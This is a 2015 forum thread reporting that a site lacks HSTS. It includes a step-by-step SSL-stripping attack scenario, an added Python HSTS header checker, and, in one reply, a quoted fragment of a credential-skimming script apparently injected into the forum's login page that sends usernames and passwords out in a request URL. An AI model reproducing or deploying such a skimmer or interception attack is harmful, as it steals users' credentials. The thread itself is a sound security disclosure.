Problem/Bug No HSTS for

Discussion in 'Forum Feedback' started by lol768, Dec 9, 2015.

Thread Status:
Not open for further replies.
  1.
    1. User types '' into their browser address bar and hits enter whilst at a conference on an open WiFi network. They've visited the site before in the past and now that it uses SSL everything should be okay, right?
    2. Attacker intercepts HTTP request on port 80. Normally the response would be something like:
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 09 Dec 2015 10:59:25 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      Server: cloudflare-nginx
    3. Attacker connects to on the victim's behalf, swallows the redirect response and serves all the secure pages back to the victim on port 80.
    4. Victim logs into the forums, inadvertently sends the password to the attacker and has their session cookie compromised too.
    5. Victim happens to have admin access. Attacker uses this to inject malicious scripts into the page and compromise even more accounts.
    6. Eventually someone notices and notifies Curse. Maybe the script is removed after a few months, maybe the users are informed - it doesn't matter because at this point all of the passwords of those who've logged in have been compromised. A smarter script would forcibly log the user out and make them log in again to harvest the passwords of everyone who visited.
    Last edited: Dec 9, 2015
    ferrybig likes this.
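The scenario above hinges on the browser never having been told to refuse plain HTTP. The following is an added example, not code from the thread or from the forum operator: it parses a Strict-Transport-Security header per RFC 6797 and reports why a port-80 redirect like the one quoted can never protect a returning visitor on its own. The sample headers are constructed.

```python
"""Check a response's Strict-Transport-Security (HSTS) posture per RFC 6797.
Added example for this thread, not code from the forum or its operator;
the sample headers at the bottom are constructed."""
import re

ONE_YEAR = 31536000  # the max-age most guidance treats as the minimum


def parse_hsts(header):
    """Parse an STS value; None if absent or invalid (RFC 6797 section 6.1).
    Names are case-insensitive; max-age is required, may be quoted, and
    must not be repeated."""
    if header is None:
        return None
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age":
            if policy["max_age"] is not None or not re.fullmatch(r"\d+", value):
                return None
            policy["max_age"] = int(value)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


def assess_hsts(scheme, headers):
    """Return findings for one response fetched over `scheme`. Browsers ignore
    STS over plain HTTP (RFC 6797 section 8.1), so the port-80 redirect quoted
    in the thread can never set a policy on its own."""
    if scheme != "https":
        return ["plain-HTTP response: the redirect itself can be intercepted"]
    sts = next((v for k, v in headers.items()
                if k.lower() == "strict-transport-security"), None)
    policy = parse_hsts(sts)
    if policy is None:
        return ["no valid HSTS policy: later HTTP requests can be downgraded"]
    findings = []
    if policy["max_age"] < ONE_YEAR:
        findings.append(f"max-age {policy['max_age']} is below one year")
    if not policy["include_subdomains"]:
        findings.append("includeSubDomains missing: subdomains stay downgradable")
    return findings


# Constructed samples: the redirect quoted in the thread and two HTTPS replies.
HTTP_REDIRECT = {"Server": "cloudflare-nginx", "Connection": "keep-alive"}
WEAK_HTTPS = {"Strict-Transport-Security": "max-age=300"}
GOOD_HTTPS = {"strict-transport-security": 'max-age="31536000"; includeSubDomains; preload'}
```

Even a valid policy only takes effect after one successful HTTPS visit; the first connection from a new browser remains a cold request unless the host is on the preload list.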
  2.
    MITM ftw!
  3. This wouldn't happen to be a disappointing Minecraft themed convention hosted in London, would it?
    teej107 likes this.
  4.
    There was a recent bug where it wouldn't log you in. No matter how many times you "logged in", it wouldn't log you in.
  5.
    @teej107 That was cookie related and may have had to do with the script (but I have no idea if it did).
  6.
    Yeah who knows :p The bug did seem to appear after the admin account got compromised.
  7.
    @Lolmewn I looked at the script. All it did was listen for the form submission. I don't think it would have caused the cookie issue, but it is strange that the time frames match.

    EDIT: Here's the script from October 22
    function authXen()
    var xmlhttp = getXmlHttp();
    var user = encodeURI(document.getElementById("ctrl_pageLogin_login").value);
    var pass = encodeURI(document.getElementById("ctrl_pageLogin_password").value);
    var url = "/web/20151022200106/";
    url = url.concat(user);
    url = url.concat("&p=");
    url = url.concat(pass);"GET", url);
    Last edited: Dec 28, 2015
  8.
    Ultimately we can't know what the script did; it could have served different code based on the user agent, location of the victim, or time of day. It could've evolved, changed its purpose, etc.
  9.
    Thanks for information... :)